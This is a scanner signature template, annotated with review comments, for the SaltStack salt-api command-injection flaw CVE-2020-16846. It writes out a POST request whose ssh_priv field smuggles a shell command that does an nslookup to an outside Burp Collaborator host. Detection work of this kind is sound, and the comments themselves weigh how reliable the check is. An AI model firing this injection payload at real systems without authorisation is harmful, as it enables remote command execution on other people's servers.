# Scanner signature for CVE-2020-16846 (SaltStack). Sends one POST to the
# target's /run endpoint and evaluates the response with the expression under
# `detections`. Schema (params / requests / detections) is the consuming
# scanner's, not plain YAML semantics — check its docs for template syntax.
id: saltstack-rce
info:
  name: saltstack-rce CVE-2020-16846

# Template parameters; `{{.cmd}}` below is replaced with this value.
params:
  # URL-encoded command string. The hostname is a hard-coded Burp Collaborator
  # name, i.e. a one-off out-of-band callback — NOTE(review): presumably meant
  # as a placeholder; confirm before relying on this signature.
  - cmd: 'nslookup%20dr8zexrxqe7p9bx00go7kyq2nttkh9.burpcollaborator.net'

requests:
  - method: POST
    # Do not follow 3xx responses; the status check below sees the raw reply.
    redirect: false
    # Folded-strip scalar (`>-`): no trailing newline, so the URL is exactly
    # `{{.BaseURL}}/run`.
    url: >-
     {{.BaseURL}}/run
    # Sequence of single-key mappings — one header per list item.
    headers:
      - Accept: application/x-yaml
      - Content-Type: application/x-www-form-urlencoded
    # Literal block (`|`) keeps its trailing newline, so the request body is
    # sent with a final "\n". The parameter value from `params.cmd` is
    # spliced in verbatim at `{{.cmd}}`.
    body: |
      token=12312&client=ssh&tgt=pyn3rd&fun=a&roster=qwe&ssh_priv=aaa%26%20{{.cmd}}
    # Match rule evaluated against the response: HTTP 200, a YAML content type
    # in the response headers, and the text "return:" in the body. These checks
    # only show the API answered in its normal YAML format; they do not
    # observe the DNS lookup that `cmd` would trigger, so a positive here is
    # weaker evidence than an out-of-band callback (verify against the
    # collaborator log).
    detections:
      - >-
        StatusCode() == 200 && StringSearch("resHeaders", "application/x-yaml") && StringSearch("body", "return:")

# Vendor disclosure and the original researcher's write-up.
references:
  - https://www.saltstack.com/blog/on-november-3-2020-saltstack-publicly-disclosed-three-new-cves/
  - https://twitter.com/pyn3rd/status/1327070000964780033